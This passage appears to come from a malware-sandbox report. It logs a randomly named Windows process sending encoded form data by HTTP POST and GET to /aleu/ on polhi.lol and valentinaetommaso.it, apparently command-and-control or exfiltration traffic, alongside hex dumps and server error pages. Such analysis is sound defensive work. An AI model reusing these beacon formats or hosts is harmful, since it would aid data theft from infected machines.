                                                                                                                                                                          Data Ascii: 103e<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title></title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><style>*, body, html { margin: 0; padding: 0;}body, html { --text-opacity: 1; color: #404040; color: rgba(64,64,64,var(--text-opacity)); -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; font-family: system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji; font-size: 16px;}* { box-sizing: border-box;}html[Attri
                                                                                                                                                                          Apr 26, 2024 07:44:03.435328960 CEST1289INData Raw: 62 75 74 65 73 20 53 74 79 6c 65 5d 20 7b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 6c 6f 63 61 6c 65 3a 20 22 65 6e 2d 55 53 22 3b 0a 7d 0a 2e 70 2d 30 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 0a 0a 2e 77 2d 32 34 30 20 7b 0a
                                                                                                                                                                          Data Ascii: butes Style] { -webkit-locale: "en-US";}.p-0 { padding: 0;}.w-240 { width: 60rem;}.antialiased { -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale;}.pt-10 { padding-top: 2.5rem;}.mb-15
                                                                                                                                                                          Apr 26, 2024 07:44:03.435499907 CEST1289INData Raw: 6d 78 2d 61 75 74 6f 20 70 74 2d 31 30 20 6c 67 3a 70 74 2d 36 20 6c 67 3a 70 78 2d 38 20 77 2d 32 34 30 20 6c 67 3a 77 2d 66 75 6c 6c 20 6d 62 2d 31 35 20 61 6e 74 69 61 6c 69 61 73 65 64 22 3e 0a 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61
                                                                                                                                                                          Data Ascii: mx-auto pt-10 lg:pt-6 lg:px-8 w-240 lg:w-full mb-15 antialiased"> <h1 class="inline-block md:block mr-2 md:mb-2 font-light text-60 md:text-3xl text-black-dark leading-tight"> <span data-translate="error">Error</span>
                                                                                                                                                                          Apr 26, 2024 07:44:03.435540915 CEST458INData Raw: 6c 61 74 65 3d 22 77 68 61 74 5f 63 61 6e 5f 69 5f 64 6f 22 3e e5 a6 82 e4 bd 95 e8 a7 a3 e5 86 b3 3f 3c 2f 68 32 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e e8 af b7 e5 88 b0 43 44 4e e5 90 8e e5 8f b0 e6 b7 bb e5 8a a0 e6 ad a4 e5 9f 9f
                                                                                                                                                                          Data Ascii: late="what_can_i_do">?</h2> <p>CDN</p> </div> </section> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          33192.168.2.74975991.195.240.19802912C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Apr 26, 2024 07:44:08.865376949 CEST741OUTPOST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.polhi.lol
                                                                                                                                                                          Origin: http://www.polhi.lol
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 220
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.polhi.lol/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Raw: 4d 7a 59 44 6b 6c 66 3d 51 61 45 52 71 6b 65 67 42 57 77 4c 62 34 59 65 43 32 30 33 59 47 41 79 76 77 76 4f 68 73 63 56 2f 62 46 54 6f 32 52 63 34 43 4a 4d 5a 55 61 6f 42 75 58 34 4d 67 38 30 4e 31 7a 4d 52 64 31 66 39 6a 42 6a 41 4c 36 69 6a 38 37 69 47 41 71 72 61 6d 4e 2b 57 4c 68 4b 67 6d 71 45 4f 39 4c 68 33 69 62 39 34 6d 6b 64 42 68 6b 43 4f 33 37 56 61 79 76 30 6a 56 30 6d 54 4e 50 7a 4b 61 6d 62 4c 75 64 65 67 55 63 54 48 68 45 6b 55 6f 45 37 49 6e 53 75 55 48 6e 57 75 42 52 4f 47 48 70 4c 41 2f 51 6a 76 43 68 30 54 51 73 46 5a 50 30 4d 69 37 39 4f 2b 34 73 77 62 32 6f 68 6b 56 7a 6d 4f 35 74 59 30 38 35 57 31 47 35 72 55 64 67 63 6d 77 3d 3d
                                                                                                                                                                          Data Ascii: MzYDklf=QaERqkegBWwLb4YeC203YGAyvwvOhscV/bFTo2Rc4CJMZUaoBuX4Mg80N1zMRd1f9jBjAL6ij87iGAqramN+WLhKgmqEO9Lh3ib94mkdBhkCO37Vayv0jV0mTNPzKambLudegUcTHhEkUoE7InSuUHnWuBROGHpLA/QjvCh0TQsFZP0Mi79O+4swb2ohkVzmO5tY085W1G5rUdgcmw==
                                                                                                                                                                          Apr 26, 2024 07:44:09.108086109 CEST208INHTTP/1.1 403 Forbidden
                                                                                                                                                                          content-length: 93
                                                                                                                                                                          cache-control: no-cache
                                                                                                                                                                          content-type: text/html
                                                                                                                                                                          connection: close
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                          Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          34192.168.2.74976091.195.240.19802912C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Apr 26, 2024 07:44:11.645379066 CEST761OUTPOST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.polhi.lol
                                                                                                                                                                          Origin: http://www.polhi.lol
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 240
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.polhi.lol/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Raw: 4d 7a 59 44 6b 6c 66 3d 51 61 45 52 71 6b 65 67 42 57 77 4c 4a 74 51 65 42 56 63 33 5a 6d 41 7a 67 51 76 4f 72 4d 64 63 2f 62 5a 54 6f 7a 70 4d 34 77 74 4d 59 32 43 6f 54 36 6a 34 50 67 38 30 59 46 79 48 4d 4e 31 69 39 6a 4e 72 41 4b 57 69 6a 38 76 69 47 42 61 72 5a 56 56 39 45 72 68 79 72 47 71 47 54 4e 4c 68 33 69 62 39 34 6d 78 4b 42 67 4d 43 4f 48 72 56 62 54 76 33 74 31 30 35 45 39 50 7a 4f 61 6d 66 4c 75 64 38 67 51 38 35 48 6a 73 6b 55 6f 30 37 49 79 6d 74 4e 33 6e 55 67 68 51 2b 58 7a 77 6b 4c 2f 59 42 70 68 68 35 57 42 38 31 52 5a 70 75 34 5a 78 69 67 70 55 4c 66 30 4d 58 7a 7a 75 54 4d 34 70 41 35 65 4e 33 71 78 63 42 5a 50 42 59 77 4e 44 37 76 35 4d 39 62 32 46 43 42 6b 64 37 6b 73 46 4b 74 43 38 3d
                                                                                                                                                                          Data Ascii: MzYDklf=QaERqkegBWwLJtQeBVc3ZmAzgQvOrMdc/bZTozpM4wtMY2CoT6j4Pg80YFyHMN1i9jNrAKWij8viGBarZVV9ErhyrGqGTNLh3ib94mxKBgMCOHrVbTv3t105E9PzOamfLud8gQ85HjskUo07IymtN3nUghQ+XzwkL/YBphh5WB81RZpu4ZxigpULf0MXzzuTM4pA5eN3qxcBZPBYwND7v5M9b2FCBkd7ksFKtC8=
                                                                                                                                                                          Apr 26, 2024 07:44:11.907088041 CEST208INHTTP/1.1 403 Forbidden
                                                                                                                                                                          content-length: 93
                                                                                                                                                                          cache-control: no-cache
                                                                                                                                                                          content-type: text/html
                                                                                                                                                                          connection: close
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                          Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          35192.168.2.74976191.195.240.19802912C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Apr 26, 2024 07:44:14.424132109 CEST1774OUTPOST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.polhi.lol
                                                                                                                                                                          Origin: http://www.polhi.lol
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 1252
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.polhi.lol/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Raw: 4d 7a 59 44 6b 6c 66 3d 51 61 45 52 71 6b 65 67 42 57 77 4c 4a 74 51 65 42 56 63 33 5a 6d 41 7a 67 51 76 4f 72 4d 64 63 2f 62 5a 54 6f 7a 70 4d 34 77 6c 4d 59 44 57 6f 42 4e 2f 34 4f 67 38 30 45 56 7a 41 4d 4e 31 7a 39 6a 6c 76 41 4c 71 49 6a 35 72 69 55 33 47 72 63 6b 56 39 64 62 68 79 32 57 71 46 4f 39 4c 77 33 69 72 78 34 6d 68 4b 42 67 4d 43 4f 46 6a 56 63 43 76 33 76 31 30 6d 54 4e 50 76 4b 61 6d 33 4c 74 73 42 67 51 34 44 47 53 4d 6b 55 4d 51 37 45 67 2b 74 53 48 6e 61 6a 68 51 6d 58 32 6f 37 4c 2f 45 4e 70 69 38 75 57 44 73 31 48 2f 63 4f 6f 59 73 34 2f 50 4e 58 58 56 45 61 39 53 75 38 49 37 39 66 37 66 74 30 6a 78 63 50 53 39 74 69 6d 37 53 32 33 71 73 70 43 43 6c 30 4f 78 49 66 67 2b 42 50 30 45 65 32 32 65 2b 68 38 61 61 42 53 4f 46 47 70 71 31 4c 63 74 50 6d 58 2f 43 67 66 76 6d 44 36 4a 67 2f 47 4c 54 4e 30 32 6c 6b 53 76 38 71 42 2b 32 44 6c 30 78 51 7a 61 43 70 34 58 71 65 76 32 55 56 54 66 76 61 72 63 31 77 2b 68 6b 51 53 6c 57 74 4a 79 50 54 72 69 6f 65 32 5a 54 4f 32 4a 67 57 69 70 5a 66 49 75 76 4a 35 37 44 44 74 51 68 63 58 51 66 4a 77 7a 62 43 75 4f 4e 6f 43 35 6a 39 2b 61 47 35 65 4e 53 59 6b 63 6b 2b 61 36 52 76 7a 4b 74 52 34 78 71 58 68 51 63 4a 58 33 41 36 54 75 65 75 42 75 52 43 38 46 48 53 74 51 31 6f 4e 78 2f 4e 4a 6e 48 35 77 32 72 56 44 49 37 45 33 76 43 4b 38 56 44 4b 31 77 4d 73 47 55 57 55 56 77 35 4c 32 52 62 6c 4b 6b 51 55 6b 70 62 70 62 76 32 44 44 4b 41 65 4c 2b 73 76 52 75 70 38 57 4f 79 47 51 51 2b 70 41 34 4a 4e 6b 50 71 55 65 58 6d 76 66 44 4f 2b 78 6c 59 46 49 6f 72 44 2b 4c 33 76 73 32 71 45 4a 58 6c 7a 62 44 54 33 76 6a 4e 64 37 4e 52 54 69 77 6a 30 77 58 74 30 77 42 44 59 4c 36 59 76 73 61 2b 47 30 33 6a 69 6f 44 61 51 68 53 42 42 6d 7a 53 56 62 57 6f 30 6c 7a 4d 49 4e 4d 69 4d 57 57 74 5a 62 62 54 6c 73 79 32 4d 4e 4f 73 2b 38 41 56 57 30 38 30 33 4e 36 7a 66 55 37 6c 66 42 54 76 6c 78 74 38 4e 46 30 6f 36 4f 6f 62 2b 74 51 66 63 37 37 59 57 4d 36 51 59 6b 6f 6f 52 38 79 58 55 77 4d 34 37 2b 4b 43 6a 75 37 57 41 31 44 6b 72 4f 6e 64 2f 43 71 62 37 39 4e 31 37 69 4d 32 7a 74 45 48 65 35 62 65 41 73 72 62 59 56 42 61 66 52 50 49 4c 59 44 36 59 59 48 64 75 6d 57 42 36 44 4e 6c 51 75 38 6f 45 6d 76 46 57 78 37 75 4f 50 64 55 6c 75 31 5a 61 31 4c 70 57 50 45 34 45 39 71 44 66 49 58 4c 6b 48 71 59 37 76 73 4e 31 4b 6d 58 42 43 6d 43 6e 41 57 72 51 55 49 45 64 4f 74 39 6c 6f 6d 42 55 53 58 2b 52 53 64 45 59 63 38 43 34 57 48 6c 77 66 37 6a 67 64 48 41 6a 51 2b 41 49 71 48 53 57 46 71 2f 39 58 36 55 6d 57 34 57 46 4d 42 32 67 6d 35 77 69 73 78 62 63 32 4a 47 62 61 46 7a 4c 4e 4a 7a 47 77 4e 44 49 37 5a 53 37 55 2f 76 79 45 34 48 4a 48 56 62 52 32 53 30 79 4a 68 35 7a 66 4d 55 37 6d 78 4b 5a 4a 4b 68 74 75 41 47 38 50 64 6d 35 65 65 42 63 34 76 33 4a 55 6f 61 69 36 65 61 54 4a 51 4c 51 6e 4e 6f 4a 37 59 37 51 59 39 4a 76 75 56 36 5a 50 78 65 4d 4e 41 58 66 4c 7a 7a 7a 52 75 71 4c 75 4c 46 79 41 73 54 66 38 50 5a 57 30 2f 59 64 4c 43 52 69 75 57 65 39 58 63 65 70 78 65 7a 61 53 76 6f 4f 31 4f 6f 32 64 6c 4d 77 33 49 2b 71 7a 6c 77 6a 68 5a 75 49 69 74 54 34 6d 4e 72 64 33 75 69 66 78 64 4b 4f 61 63 69 71 45 38 77 57 2f 48 54 64 31 72 4d 63 69 36 56 67 35 59 5a 6b 74 75 4f 6d 46 77 63 4f 58 36 71 62 4a 72 4c 64 66 5a 66 48 49 34 39 43 66 63 73 68 6e 67 50 51 63 39 7a 57 68 71 6e 4f 55 42 32 59 56 53 78 6f 36 64 79 73 4c 4a 41 52 49 4c 4a 67 49 4f 33 75 48 2f 7a 73 48 54 69 6b 68 4c 44 78 53 6c 4c 62 56 2b 32 48 46 45 36 4d 34 69 6e 54 78 6d 53 44 2f 7a 4b 37 32 69 52 6f 48 6e 4b 4f 61 71 56 46 64 46 59 6a 77 38 48 46 30 71 55 47 4d 6e 69 4d 78 47 75 66 2f 32 6a 73 4a 2b 59 72 69 66 52 6b 67 75 4a 49 6c 39 75 6e 30 49 50 52 62 48 76 66 4e 64 66 56 5a 32 7a 67 7a 4f 30 63 6f 51 53 50 57 33 77 54 4a 6f 75 6d 76 39 46 74 62 33 32 32 48 47 33 4b 30 74 50 54
                                                                                                                                                                          Data Ascii: MzYDklf=QaERqkegBWwLJtQeBVc3ZmAzgQvOrMdc/bZTozpM4wlMYDWoBN/4Og80EVzAMN1z9jlvALqIj5riU3GrckV9dbhy2WqFO9Lw3irx4mhKBgMCOFjVcCv3v10mTNPvKam3LtsBgQ4DGSMkUMQ7Eg+tSHnajhQmX2o7L/ENpi8uWDs1H/cOoYs4/PNXXVEa9Su8I79f7ft0jxcPS9tim7S23qspCCl0OxIfg+BP0Ee22e+h8aaBSOFGpq1LctPmX/CgfvmD6Jg/GLTN02lkSv8qB+2Dl0xQzaCp4Xqev2UVTfvarc1w+hkQSlWtJyPTrioe2ZTO2JgWipZfIuvJ57DDtQhcXQfJwzbCuONoC5j9+aG5eNSYkck+a6RvzKtR4xqXhQcJX3A6TueuBuRC8FHStQ1oNx/NJnH5w2rVDI7E3vCK8VDK1wMsGUWUVw5L2RblKkQUkpbpbv2DDKAeL+svRup8WOyGQQ+pA4JNkPqUeXmvfDO+xlYFIorD+L3vs2qEJXlzbDT3vjNd7NRTiwj0wXt0wBDYL6Yvsa+G03jioDaQhSBBmzSVbWo0lzMINMiMWWtZbbTlsy2MNOs+8AVW0803N6zfU7lfBTvlxt8NF0o6Oob+tQfc77YWM6QYkooR8yXUwM47+KCju7WA1DkrOnd/Cqb79N17iM2ztEHe5beAsrbYVBafRPILYD6YYHdumWB6DNlQu8oEmvFWx7uOPdUlu1Za1LpWPE4E9qDfIXLkHqY7vsN1KmXBCmCnAWrQUIEdOt9lomBUSX+RSdEYc8C4WHlwf7jgdHAjQ+AIqHSWFq/9X6UmW4WFMB2gm5wisxbc2JGbaFzLNJzGwNDI7ZS7U/vyE4HJHVbR2S0yJh5zfMU7mxKZJKhtuAG8Pdm5eeBc4v3JUoai6eaTJQLQnNoJ7Y7QY9JvuV6ZPxeMNAXfLzzzRuqLuLFyAsTf8PZW0/YdLCRiuWe9XcepxezaSvoO1Oo2dlMw3I+qzlwjhZuIitT4mNrd3uifxdKOaciqE8wW/HTd1rMci6Vg5YZktuOmFwcOX6qbJrLdfZfHI49CfcshngPQc9zWhqnOUB2YVSxo6dysLJARILJgIO3uH/zsHTikhLDxSlLbV+2HFE6M4inTxmSD/zK72iRoHnKOaqVFdFYjw8HF0qUGMniMxGuf/2jsJ+YrifRkguJIl9un0IPRbHvfNdfVZ2zgzO0coQSPW3wTJoumv9Ftb322HG3K0tPT
                                                                                                                                                                          Apr 26, 2024 07:44:14.666940928 CEST208INHTTP/1.1 403 Forbidden
                                                                                                                                                                          content-length: 93
                                                                                                                                                                          cache-control: no-cache
                                                                                                                                                                          content-type: text/html
                                                                                                                                                                          connection: close
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                          Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          36192.168.2.74976291.195.240.19802912C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Apr 26, 2024 07:44:17.207461119 CEST496OUTGET /aleu/?MzYDklf=dYsxpTaff089Ev8jBScoXXc5jj7jmMQs0q0Eu2dlyBwZckm7Y/SiQVQbLF6BJ7sO5g5GU6+4isz0GnabBFwpFqtsgzPEUtDw4CvXwSk6GQMDGBmxey3onV8TCNPZOIX4PotVszp0FWYE&PHaLL=ePmHKpKXdtoDqXh HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Host: www.polhi.lol
                                                                                                                                                                          Connection: close
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Apr 26, 2024 07:44:17.450356007 CEST208INHTTP/1.1 403 Forbidden
                                                                                                                                                                          content-length: 93
                                                                                                                                                                          cache-control: no-cache
                                                                                                                                                                          content-type: text/html
                                                                                                                                                                          connection: close
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                          Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          37192.168.2.7497633.125.172.46802912C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Apr 26, 2024 07:44:23.608436108 CEST774OUTPOST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.valentinaetommaso.it
                                                                                                                                                                          Origin: http://www.valentinaetommaso.it
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 220
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.valentinaetommaso.it/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Raw: 4d 7a 59 44 6b 6c 66 3d 6e 4c 77 37 62 41 57 64 69 61 50 47 46 62 33 37 51 75 6b 79 45 2f 47 75 32 4d 4e 6a 38 44 46 51 4e 75 44 55 73 2f 31 46 4c 5a 6c 70 78 79 67 79 6e 66 6b 49 48 70 74 6a 59 6a 44 71 79 38 6e 6d 63 6e 61 57 52 77 65 53 34 74 54 55 4c 4d 46 71 45 45 4c 7a 47 76 44 4c 6c 55 31 65 54 45 4f 59 6d 54 55 37 6d 78 58 75 6a 53 33 4f 41 37 50 65 4e 58 39 2b 67 55 37 68 54 31 76 53 51 38 46 7a 4d 5a 36 36 34 38 37 2b 31 63 69 4e 54 61 46 50 73 69 76 6c 47 49 62 74 4b 74 58 55 57 59 6d 6c 59 37 36 63 76 6f 2f 50 39 2b 58 4e 49 42 4f 6d 67 37 78 65 32 67 49 30 33 6f 45 78 4e 4e 67 66 2f 58 4a 75 62 41 77 78 76 74 6f 38 35 48 61 33 4f 41 3d 3d
                                                                                                                                                                          Data Ascii: MzYDklf=nLw7bAWdiaPGFb37QukyE/Gu2MNj8DFQNuDUs/1FLZlpxygynfkIHptjYjDqy8nmcnaWRweS4tTULMFqEELzGvDLlU1eTEOYmTU7mxXujS3OA7PeNX9+gU7hT1vSQ8FzMZ66487+1ciNTaFPsivlGIbtKtXUWYmlY76cvo/P9+XNIBOmg7xe2gI03oExNNgf/XJubAwxvto85Ha3OA==
                                                                                                                                                                          Apr 26, 2024 07:44:23.901870966 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                                          Server: openresty
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:44:23 GMT
                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Set-Cookie: PHPSESSID=4sf9f9dr8163fg43an66jnm1vs; path=/; domain=valentinaetommaso.it; HttpOnly
                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                          Data Raw: 33 37 39 64 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 7d 6d 77 db 38 92 ee e7 e9 73 e6 3f b0 b5 3b 3d f6 6d 8b 7a b5 64 39 56 7a dd 8e d3 f1 dd 38 f1 c4 4e f7 ce 24 59 1d 8a a2 24 26 12 a9 88 94 1d c7 9d 1f 76 3f df 3f 76 9f a7 00 90 a0 5e 6c 25 d3 7b 76 3f dc 3e 1d 99 22 80 42 a1 50 a8 2a 14 aa a0 a3 ef 9f bc 3c b9 fa fb c5 a9 33 4e a7 93 c7 df 1d f1 8f e3 4f bc 24 e9 96 a2 b8 fc 3e 29 39 b3 79 30 0c 3f 75 4b f1 e8 10 b5 d2 59 72 58 a9 c4 a3 99 3b 0d 2a 51 f2 2f 25 67 e2 45 a3 6e 29 4c 4b 6c 1e 78 83 c7 47 93 30 fa e0 cc 83 49 b7 84 b6 7e 1c 45 81 9f 96 9c 31 e0 74 4b 06 c2 a0 36 08 eb 93 cf 8b 71 a7 3d 1c d7 5d 7f 12 2f 06 c3 79 1c a5 6e 14 a0 b2 3f 8f 93 24 9e 87 a3 30 da 0e de 10 4d 13 77 94 a4 5e 1a fa ae 1f 4f 97 60 4c 83 d4 73 fc b1 37 4f 82 b4 5b 5a a4 c3 f2 41 c9 86 1c 02 cf af c2 b1 32 0c 27 41 52 a9 0f f0 7f c8 7f d7 8d b1 9b 5c 8f 7e 9a 8d bb 7e bf e1 b5 0f 82 ce 7e bb e4 a4 b7 b3 00 e4 99 7a a3 a0 82 e2 1f 3f 4d 27 25 27 09 3f 07 a0 b0 17 dd fe 21 48 54 db 95 6a 7b c8 7f 9f 3f 1e 7c 2d 12 b5 d6 a7 5a eb 0f 41 a3 f6 be 52 7b df e0 bf 76 ab ed 82 a2 4b b4 b0 e9 ed cd 66 93 a0 9c c6 0b 7f 5c fe 56 da 7f 4d 7f ff 65 7d 7c e7 e0 bf 23 61 2f f2 76 39 f8 b8 08 af bb a5 ff 28 bf 3e 2e 9f c4 d3 19 f8 b1 3f 09 c0 8d 60 d0 20 02 ef 9d 9d 76 83 c1 28 c0 72 91 96 69 98 4e 82 c7 cd 6a d3 29 3b 17 1e f8 dd 73 a2 38 72 d2 79 7c ed 81 65 0f 0f 9d a9 97 ce c3 69 1c 85 78 33 01 08 54 09 d2 78 3a f5 92 f8 a8 a2 9a 5b 48 44 de 14 fc 76 1d 06 37 b3 78 ce 95 64 fa bd 09 07 e9 b8 3b 08 ae 43 3f 28 cb 97 bd 30 0a d3 d0 9b 94 13 1f 80 bb 35 83 92 0c 46 c1 99 26 9c a8 d0 c7 28 e2 a8 9c 7a b3 f2 38 1c 8d 27 f8 67 83 8e 62 d3 54 96 fe 57 ac 74 bd 8a aa cd 4a b5 39 e3 bf f0 60 df f5 93 64 89 73 9c 69 30 08 3d ca 93 30 42 c7 22 5b 92 f4 16 0b 70 1c 40 5c 68 52 7e 63 e7 f5 f7 95 fa fb 5b fe db 1f 75 ee e9 3c f1 e7 41 10 39 5e 34 70 76 a6 61 a4 68 78 58 ab f2 bf 60 ba bb 8a 96 33 c0 0c 96 95 00 f0 3f 96 9c 41 98 78 e0 85 81 8d ee f2 50 be 46 4c 1a e2 7d ac 54 3f d6 f9 af de 49 d7 e0 6f 2f 3b 8b 68 df d0 53 a3 5e 69 d4 43 fe 6b ed 7f 5c d3 93 99 a6 f5 94 6a b4 dd 7d d2 e9 8f c3 a7 06 61 d3 48 f8 af f3 be bd 0e 1f 99 80 9b 68 d0 f3 e3 49 3c ef 25 fe 38 98 06 3d 4a ee 6e e9 0f c4 a3 1a 54 aa 01 64 70 d0 fe 14 ce 